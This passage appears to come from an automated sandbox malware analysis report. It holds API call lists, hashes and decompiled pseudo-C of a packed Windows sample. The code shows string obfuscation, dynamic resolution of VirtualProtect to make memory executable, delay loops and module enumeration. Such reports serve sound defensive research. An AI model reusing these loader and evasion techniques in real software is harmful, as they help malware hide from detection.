                                                                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00404BFF
                                                                                                                                    • DeleteFiber.KERNEL32(00000000), ref: 00404C06
                                                                                                                                    • GetPrivateProfileStructA.KERNEL32 ref: 00404C23
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00404C29
                                                                                                                                    • InterlockedExchange.KERNEL32(00000000,00000000), ref: 00404C31
                                                                                                                                    • RtlCaptureContext.KERNEL32(?), ref: 00404C3E
                                                                                                                                    • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00404C47
                                                                                                                                    • LocalFlags.KERNEL32 ref: 00404C4E
                                                                                                                                    • OpenMutexA.KERNEL32 ref: 00404C57
                                                                                                                                    • GetStringTypeExA.KERNEL32(00000000,00000000,furaguk,00000000,?), ref: 00404C69
                                                                                                                                    • GetComputerNameA.KERNEL32 ref: 00404C7A
                                                                                                                                    • InitializeCriticalSection.KERNEL32(?), ref: 00404C84
                                                                                                                                    • LoadLibraryW.KERNEL32(00000000), ref: 00404CA3
                                                                                                                                    • GetModuleHandleA.KERNEL32(msimg32.dll), ref: 00404CB3
                                                                                                                                    • GetProcAddress.KERNEL32(msimg32.dll), ref: 00404CD7
                                                                                                                                    • InterlockedDecrement.KERNEL32(00000000), ref: 00404D20
                                                                                                                                    • GetCurrentConsoleFont.KERNEL32(00000000,00000000,00000000), ref: 00404D54
                                                                                                                                    • GlobalFlags.KERNEL32(00000000), ref: 00404D5B
                                                                                                                                    • FindNextVolumeA.KERNEL32(00000000,00000000,00000000), ref: 00404D64
                                                                                                                                    • GetConsoleFontSize.KERNEL32(00000000,00000000), ref: 00404D6C
                                                                                                                                    • CreateJobObjectA.KERNEL32(00000000,xolat), ref: 00404D78
                                                                                                                                    • GetModuleHandleW.KERNEL32(mazez), ref: 00404D83
                                                                                                                                    • FormatMessageW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00404D96
                                                                                                                                    • CreateActCtxA.KERNEL32 ref: 00404DA0
                                                                                                                                    • GetConsoleTitleA.KERNEL32(?,00000000), ref: 00404DAE
                                                                                                                                    • GetCalendarInfoA.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 00404DC3
                                                                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 00404DD3
                                                                                                                                    • FindFirstChangeNotificationA.KERNEL32(00000000,00000000,00000000), ref: 00404DDC
                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00404DE6
                                                                                                                                    • InterlockedDecrement.KERNEL32(00000000), ref: 00404DED
                                                                                                                                    • GetCommandLineA.KERNEL32 ref: 00404DEF
                                                                                                                                    • SearchPathA.KERNEL32(pehifidukoviyawucukuhajumozuzepofuwi,rinadivafinicihaz,wozuvicepilubolumoyujiyopemetevosipijilatumejuwivola,00000000,?,?), ref: 00404E10
                                                                                                                                    • WriteConsoleOutputA.KERNEL32(00000000,?,?,0003E4E2,?), ref: 00404E39
                                                                                                                                    • GetProfileSectionA.KERNEL32(Lucopeju jif,?,00000000), ref: 00404E4C
                                                                                                                                    • MoveFileWithProgressA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00404E57
                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 00404E5D
                                                                                                                                    • WriteConsoleA.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404E79
                                                                                                                                    • lstrcpynW.KERNEL32(?,00000000,00000000), ref: 00404E88
                                                                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00404E91
                                                                                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 00404E98
                                                                                                                                    • MoveFileWithProgressW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00404EA3
                                                                                                                                    • CreateIoCompletionPort.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404EAD
                                                                                                                                    • GetOEMCP.KERNEL32 ref: 00404EB3
                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00404EBE
                                                                                                                                    • GetPrivateProfileStructA.KERNEL32 ref: 00404ECF
                                                                                                                                    • DeleteVolumeMountPointA.KERNEL32 ref: 00404ED2
                                                                                                                                    • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00404ED9
                                                                                                                                    • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00404EEC
                                                                                                                                    • GetStringTypeW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404EF6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ConsoleInterlocked$File$CreateExchangeFindHandleInfoProfileSection$CalendarCommandCriticalDecrementDeleteEnumFlagsFontIncrementLengthLibraryLineLoadLocalModuleMovePrivateProgressStringStructTypeVolumeWithWrite$AddressAliasAliasesAllocCaptureChangeCompareCompletionComputerContextCopyCountCurrentDateDriveErrorExesFiberFirstFormatFormatsGlobalInitializeLastLeaveLogicalMessageMountMutexNameNamedNextNotificationObjectOpenOutputPathPipePointPortProcResourceSearchSizeStateStringsTickTimeTitleUnregisterVerifyVersionWaitlstrcpyn
                                                                                                                                    • String ID: Lucopeju jif$furaguk$mazez$msimg32.dll$pehifidukoviyawucukuhajumozuzepofuwi$rinadivafinicihaz$visatajojiborurexidegolacimexici$wozuvicepilubolumoyujiyopemetevosipijilatumejuwivola$xolat$yevusirovom$zofevejubolipidefenidel$NhvPhv
                                                                                                                                    • API String ID: 2425862277-2258610059
                                                                                                                                    • Opcode ID: 4135730bfec0541c765f2d5f7b3aba3c9973964668e69a17c410186be0d9831d
                                                                                                                                    • Instruction ID: dd682dfd45bdb15dea8ea0b42ed921eebb267e985dcaa92cebba9e6a11d259c8
                                                                                                                                    • Opcode Fuzzy Hash: 4135730bfec0541c765f2d5f7b3aba3c9973964668e69a17c410186be0d9831d
                                                                                                                                    • Instruction Fuzzy Hash: 41B1EBB2800259FFDB01ABA0DE88DEB777DFB48345B005876F646B2471D7389D848B68
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 55 4049ea-404ae7 LoadLibraryA VirtualProtect
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004049EA(void* __ecx) {
                                                                                                                                    				long _v8;
                                                                                                                                    				struct HINSTANCE__* _t2;
                                                                                                                                    				int _t4;
                                                                                                                                    				CHAR* _t8;
                                                                                                                                    
                                                                                                                                    				_t8 = "msimg32.dll";
                                                                                                                                    				 *0x4b4dee = 0x33;
                                                                                                                                    				 *0x4b4def = 0x32;
                                                                                                                                    				 *0x4b4df3 = 0x6c;
                                                                                                                                    				M004B4DEB = 0x6e;
                                                                                                                                    				"msimg32.dll" = 0x6b;
                                                                                                                                    				M004B4DEC = 0x65;
                                                                                                                                    				"32.dll" = 0x6c;
                                                                                                                                    				"simg32.dll" = 0x65;
                                                                                                                                    				M004B4DEA = 0x72;
                                                                                                                                    				 *0x4b4df0 = 0x2e;
                                                                                                                                    				 *0x4b4df1 = 0x64;
                                                                                                                                    				 *0x4b4df2 = 0x6c;
                                                                                                                                    				 *0x4b4df4 = 0;
                                                                                                                                    				_t2 = LoadLibraryA(_t8);
                                                                                                                                    				 *0x60ce2c = _t2;
                                                                                                                                    				 *0x4b4df3 = 0x65;
                                                                                                                                    				"simg32.dll" = 0x69;
                                                                                                                                    				M004B4DEC = 0x75;
                                                                                                                                    				 *0x4b4dee = 0x6c;
                                                                                                                                    				"32.dll" = 0x61;
                                                                                                                                    				 *0x4b4df1 = 0x6f;
                                                                                                                                    				 *0x4b4df5 = 0x74;
                                                                                                                                    				"msimg32.dll" = 0x56;
                                                                                                                                    				 *0x4b4df4 = 0x63;
                                                                                                                                    				 *0x4b4def = 0x50;
                                                                                                                                    				 *0x4b4df6 = 0;
                                                                                                                                    				M004B4DEB = 0x74;
                                                                                                                                    				 *0x4b4df2 = 0x74;
                                                                                                                                    				M004B4DEA = 0x72;
                                                                                                                                    				 *0x4b4df0 = 0x72;
                                                                                                                                    				"`ghvmsimg32.dll" = GetProcAddress(_t2, _t8);
                                                                                                                                    				_t4 = VirtualProtect( *0x60932c,  *0x60e9b0, 0x40,  &_v8); // executed
                                                                                                                                    				return _t4;
                                                                                                                                    			}







                                                                                                                                    0x004049ef
                                                                                                                                    0x004049f5
                                                                                                                                    0x004049fc
                                                                                                                                    0x00404a03
                                                                                                                                    0x00404a0a
                                                                                                                                    0x00404a11
                                                                                                                                    0x00404a18
                                                                                                                                    0x00404a1f
                                                                                                                                    0x00404a26
                                                                                                                                    0x00404a2d
                                                                                                                                    0x00404a34
                                                                                                                                    0x00404a3b
                                                                                                                                    0x00404a42
                                                                                                                                    0x00404a49
                                                                                                                                    0x00404a50
                                                                                                                                    0x00404a58
                                                                                                                                    0x00404a5d
                                                                                                                                    0x00404a64
                                                                                                                                    0x00404a6b
                                                                                                                                    0x00404a72
                                                                                                                                    0x00404a79
                                                                                                                                    0x00404a80
                                                                                                                                    0x00404a87
                                                                                                                                    0x00404a8e
                                                                                                                                    0x00404a95
                                                                                                                                    0x00404a9c
                                                                                                                                    0x00404aa3
                                                                                                                                    0x00404aaa
                                                                                                                                    0x00404ab1
                                                                                                                                    0x00404ab8
                                                                                                                                    0x00404abf
                                                                                                                                    0x00404ad8
                                                                                                                                    0x00404ae3
                                                                                                                                    0x00404ae7

                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(msimg32.dll), ref: 00404A50
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,msimg32.dll), ref: 00404AC6
                                                                                                                                    • VirtualProtect.KERNELBASE(00000040,?), ref: 00404AE3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProcProtectVirtual
                                                                                                                                    • String ID: msimg32.dll$NhvPhv
                                                                                                                                    • API String ID: 3509694964-2647807948
                                                                                                                                    • Opcode ID: b34c61c1e289694949079d1bebf8ade8db7f042771a688d9fc4cff21733d05cc
                                                                                                                                    • Instruction ID: 2d946e7decc42a510f0f4b088a3c1b10b253250eea151afb29551233ec66a0ea
                                                                                                                                    • Opcode Fuzzy Hash: b34c61c1e289694949079d1bebf8ade8db7f042771a688d9fc4cff21733d05cc
                                                                                                                                    • Instruction Fuzzy Hash: 2721AD1448C2D1DBEB12C728FC08B913E9E57A2748F0806A9D1954A2B3E7FB1618C77E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                    			E00404F07() {
                                                                                                                                    				char _v28;
                                                                                                                                    				char _v156;
                                                                                                                                    				char _v164;
                                                                                                                                    				void* __ebp;
                                                                                                                                    				intOrPtr _t4;
                                                                                                                                    				void* _t5;
                                                                                                                                    				void* _t15;
                                                                                                                                    				void* _t19;
                                                                                                                                    				void* _t20;
                                                                                                                                    
                                                                                                                                    				if( *0x60e9b0 == 3) {
                                                                                                                                    					_push(0);
                                                                                                                                    					_push(0);
                                                                                                                                    					E00409F4C("msimg32.dll", 0);
                                                                                                                                    					E00409E93(0, 0);
                                                                                                                                    					E0040775A( &_v28, 0);
                                                                                                                                    					_push(1);
                                                                                                                                    					_push(3);
                                                                                                                                    					E004086B4( &_v164);
                                                                                                                                    					_push("0");
                                                                                                                                    					_t16 =  &_v156;
                                                                                                                                    					E004085AF( &_v156, 0);
                                                                                                                                    					E00409D7C(_t15, _t19, _t20, 0);
                                                                                                                                    					E00409CE7();
                                                                                                                                    				}
                                                                                                                                    				_t4 =  *0x4225a4; // 0x8d77a
                                                                                                                                    				 *0x60e9b0 = _t4;
                                                                                                                                    				_t5 = 0;
                                                                                                                                    				do {
                                                                                                                                    					if(_t5 == 0x1737) {
                                                                                                                                    						_t16 =  *0x421008;
                                                                                                                                    						 *0x60e9b4 =  *0x421008;
                                                                                                                                    					}
                                                                                                                                    					_t5 = _t5 + 1;
                                                                                                                                    				} while (_t5 < 0x79a863);
                                                                                                                                    				E00404AE9(_t16); // executed
                                                                                                                                    				return 0;
                                                                                                                                    			}












                                                                                                                                    0x00404f17
                                                                                                                                    0x00404f1b
                                                                                                                                    0x00404f1c
                                                                                                                                    0x00404f23
                                                                                                                                    0x00404f2a
                                                                                                                                    0x00404f35
                                                                                                                                    0x00404f3a
                                                                                                                                    0x00404f3c
                                                                                                                                    0x00404f44
                                                                                                                                    0x00404f49
                                                                                                                                    0x00404f4e
                                                                                                                                    0x00404f54
                                                                                                                                    0x00404f59
                                                                                                                                    0x00404f5e
                                                                                                                                    0x00404f5e
                                                                                                                                    0x00404f63
                                                                                                                                    0x00404f68
                                                                                                                                    0x00404f6d
                                                                                                                                    0x00404f6f
                                                                                                                                    0x00404f74
                                                                                                                                    0x00404f76
                                                                                                                                    0x00404f7c
                                                                                                                                    0x00404f7c
                                                                                                                                    0x00404f82
                                                                                                                                    0x00404f83
                                                                                                                                    0x00404f8a
                                                                                                                                    0x00404f92

                                                                                                                                    APIs
                                                                                                                                    • _wscanf.LIBCMT ref: 00404F23
                                                                                                                                      • Part of subcall function 00409F4C: _vscanf.LIBCMT ref: 00409F5F
                                                                                                                                      • Part of subcall function 00409E93: MoveFileA.KERNEL32 ref: 00409E9E
                                                                                                                                      • Part of subcall function 00409E93: GetLastError.KERNEL32(?,00000003), ref: 00409EA8
                                                                                                                                      • Part of subcall function 00409E93: __dosmaperr.LIBCMT ref: 00409EB7
                                                                                                                                      • Part of subcall function 0040775A: __EH_prolog.LIBCMT ref: 0040775F
                                                                                                                                      • Part of subcall function 004086B4: __EH_prolog.LIBCMT ref: 004086B9
                                                                                                                                      • Part of subcall function 004085AF: __EH_prolog.LIBCMT ref: 004085B4
                                                                                                                                      • Part of subcall function 004085AF: std::ios_base::getloc.LIBCPMT ref: 004085F3
                                                                                                                                    • _abort.LIBCMT ref: 00404F59
                                                                                                                                      • Part of subcall function 00409D7C: __NMSG_WRITE.LIBCMT ref: 00409D9D
                                                                                                                                      • Part of subcall function 00409D7C: _raise.LIBCMT ref: 00409DAE
                                                                                                                                      • Part of subcall function 00409D7C: _memset.LIBCMT ref: 00409E46
                                                                                                                                      • Part of subcall function 00409D7C: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00409E78
                                                                                                                                      • Part of subcall function 00409D7C: UnhandledExceptionFilter.KERNEL32(?), ref: 00409E85
                                                                                                                                      • Part of subcall function 00409CE7: __getptd.LIBCMT ref: 00409CF3
                                                                                                                                      • Part of subcall function 00409CE7: _abort.LIBCMT ref: 00409D15
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog$ExceptionFilterUnhandled_abort$ErrorFileLastMove__dosmaperr__getptd_memset_raise_vscanf_wscanfstd::ios_base::getloc
                                                                                                                                    • String ID: VVdO$msimg32.dll
                                                                                                                                    • API String ID: 959639418-1842109286
                                                                                                                                    • Opcode ID: 1cd3ae52449ec9d241632d587252d43dabdf0a22b908c95d71ff79e54a7f73a3
                                                                                                                                    • Instruction ID: 64bd658d1f615fbbec6738101347dae6c5b0ac0e208cca7f560be669a4a1bfde
                                                                                                                                    • Opcode Fuzzy Hash: 1cd3ae52449ec9d241632d587252d43dabdf0a22b908c95d71ff79e54a7f73a3
                                                                                                                                    • Instruction Fuzzy Hash: 00F0F470A422206AC760F7729D86A9B3A64AF51358F00083EB546B22D3EB7C1941C69E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 79 411aed-411afc GetEnvironmentStringsW 80 411b02-411b05 79->80 81 411afe-411b01 79->81 82 411b15-411b1e call 40afb5 80->82 83 411b07-411b0c 80->83 86 411b23-411b28 82->86 83->83 84 411b0e-411b13 83->84 84->82 84->83 87 411b37-411b42 call 40ac50 86->87 88 411b2a-411b36 FreeEnvironmentStringsW 86->88 87->88
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00411AED() {
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				WCHAR* _t1;
                                                                                                                                    				void* _t5;
                                                                                                                                    				void* _t18;
                                                                                                                                    				WCHAR* _t20;
                                                                                                                                    
                                                                                                                                    				_t1 = GetEnvironmentStringsW();
                                                                                                                                    				_t20 = _t1;
                                                                                                                                    				if(_t20 != 0) {
                                                                                                                                    					if( *_t20 != 0) {
                                                                                                                                    						goto L3;
                                                                                                                                    						do {
                                                                                                                                    							do {
                                                                                                                                    								L3:
                                                                                                                                    								_t1 =  &(_t1[1]);
                                                                                                                                    							} while ( *_t1 != 0);
                                                                                                                                    							_t1 =  &(_t1[1]);
                                                                                                                                    						} while ( *_t1 != 0);
                                                                                                                                    					}
                                                                                                                                    					_t13 = _t1 - _t20 + 2;
                                                                                                                                    					_t5 = E0040AFB5(_t1 - _t20 + 2); // executed
                                                                                                                                    					_t18 = _t5;
                                                                                                                                    					if(_t18 != 0) {
                                                                                                                                    						E0040AC50(_t13, _t18, _t20, _t18, _t20, _t13);
                                                                                                                                    					}
                                                                                                                                    					FreeEnvironmentStringsW(_t20);
                                                                                                                                    					return _t18;
                                                                                                                                    				} else {
                                                                                                                                    					return 0;
                                                                                                                                    				}
                                                                                                                                    			}










                                                                                                                                    0x00411af0
                                                                                                                                    0x00411af6
                                                                                                                                    0x00411afc
                                                                                                                                    0x00411b05
                                                                                                                                    0x00000000
                                                                                                                                    0x00411b07
                                                                                                                                    0x00411b07
                                                                                                                                    0x00411b07
                                                                                                                                    0x00411b08
                                                                                                                                    0x00411b09
                                                                                                                                    0x00411b0f
                                                                                                                                    0x00411b10
                                                                                                                                    0x00411b07
                                                                                                                                    0x00411b1a
                                                                                                                                    0x00411b1e
                                                                                                                                    0x00411b23
                                                                                                                                    0x00411b28
                                                                                                                                    0x00411b3a
                                                                                                                                    0x00411b3f
                                                                                                                                    0x00411b2b
                                                                                                                                    0x00411b36
                                                                                                                                    0x00411afe
                                                                                                                                    0x00411b01
                                                                                                                                    0x00411b01

                                                                                                                                    APIs
                                                                                                                                    • GetEnvironmentStringsW.KERNEL32(00000000,0040A052), ref: 00411AF0
                                                                                                                                    • __malloc_crt.LIBCMT ref: 00411B1E
                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00411B2B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 237123855-0
                                                                                                                                    • Opcode ID: 57617313aba37edb2e6f9ef937ccd077b94cb05829d73f06247ea19b74c043b0
                                                                                                                                    • Instruction ID: 6a3905526b18ae8e7ecc32f242685ada8325d96d4deb0d309a105585c5083fee
                                                                                                                                    • Opcode Fuzzy Hash: 57617313aba37edb2e6f9ef937ccd077b94cb05829d73f06247ea19b74c043b0
                                                                                                                                    • Instruction Fuzzy Hash: C8F0E2366081215ECB20BB347C488FB1238DA8732A316443BF693C3260FA284CC682A9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 91 404604-404663 LoadLibraryA
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00404604() {
                                                                                                                                    				struct HINSTANCE__* _t1;
                                                                                                                                    
                                                                                                                                    				"msimg32.dll" = 0x6d;
                                                                                                                                    				"simg32.dll" = 0x73;
                                                                                                                                    				"32.dll" = 0x33;
                                                                                                                                    				 *0x4b4df3 = 0;
                                                                                                                                    				M004B4DEC = 0x67;
                                                                                                                                    				 *0x4b4df0 = 0x64;
                                                                                                                                    				M004B4DEB = 0x6d;
                                                                                                                                    				 *0x4b4df1 = 0x6c;
                                                                                                                                    				 *0x4b4def = 0x2e;
                                                                                                                                    				 *0x4b4df2 = 0x6c;
                                                                                                                                    				 *0x4b4dee = 0x32;
                                                                                                                                    				M004B4DEA = 0x69; // executed
                                                                                                                                    				_t1 = LoadLibraryA("msimg32.dll"); // executed
                                                                                                                                    				return _t1;
                                                                                                                                    			}




                                                                                                                                    0x00404609
                                                                                                                                    0x00404610
                                                                                                                                    0x00404617
                                                                                                                                    0x0040461e
                                                                                                                                    0x00404625
                                                                                                                                    0x0040462c
                                                                                                                                    0x00404633
                                                                                                                                    0x0040463a
                                                                                                                                    0x00404641
                                                                                                                                    0x00404648
                                                                                                                                    0x0040464f
                                                                                                                                    0x00404656
                                                                                                                                    0x0040465d
                                                                                                                                    0x00404663

                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNELBASE(msimg32.dll), ref: 0040465D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID: msimg32.dll
                                                                                                                                    • API String ID: 1029625771-3287713914
                                                                                                                                    • Opcode ID: cfdbb96f6aedfef4c6641fcb4330ca1f920841348d4057dc45bb8a5a372498b0
                                                                                                                                    • Instruction ID: 48fc9572e66de8d09d1a309b943e35ee5cabbff8e9ea15e3afadc574c0a386c3
                                                                                                                                    • Opcode Fuzzy Hash: cfdbb96f6aedfef4c6641fcb4330ca1f920841348d4057dc45bb8a5a372498b0
                                                                                                                                    • Instruction Fuzzy Hash: 0FF02E0858C2C1CBEB12C328AC187903E9E17A2748F480AA991910B6A3D2FB0219C77E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 92 9267c6-9267df 93 9267e1-9267e3 92->93 94 9267e5 93->94 95 9267ea-9267f6 CreateToolhelp32Snapshot 93->95 94->95 96 926806-926813 Module32First 95->96 97 9267f8-9267fe 95->97 98 926815-926816 call 926485 96->98 99 92681c-926824 96->99 97->96 104 926800-926804 97->104 102 92681b 98->102 102->99 104->93 104->96
                                                                                                                                    APIs
                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009267EE
                                                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 0092680E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.533353582.0000000000926000.00000040.00000800.00020000.00000000.sdmp, Offset: 00926000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_926000_6246.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3833638111-0
                                                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                    • Instruction ID: 9191c3dd0f8e41b3c0958dbd85a9d10915dbe5348c0e4f1395d232bc60328839
                                                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                    • Instruction Fuzzy Hash: 22F096312007216FD7203BF5BC8DB6E76ECAF89725F100528E682918C4DB70EC454A61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 105 40de23-40de45 HeapCreate 106 40de47-40de48 105->106 107 40de49-40de52 105->107
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040DE23(intOrPtr _a4) {
                                                                                                                                    				void* _t6;
                                                                                                                                    
                                                                                                                                    				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                    				 *0x60ec40 = _t6;
                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                    					 *0x610918 = 1;
                                                                                                                                    					return 1;
                                                                                                                                    				} else {
                                                                                                                                    					return _t6;
                                                                                                                                    				}
                                                                                                                                    			}




                                                                                                                                    0x0040de38
                                                                                                                                    0x0040de3e
                                                                                                                                    0x0040de45
                                                                                                                                    0x0040de4c
                                                                                                                                    0x0040de52
                                                                                                                                    0x0040de48
                                                                                                                                    0x0040de48
                                                                                                                                    0x0040de48

                                                                                                                                    APIs
                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,0040A00C,00000001), ref: 0040DE38
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
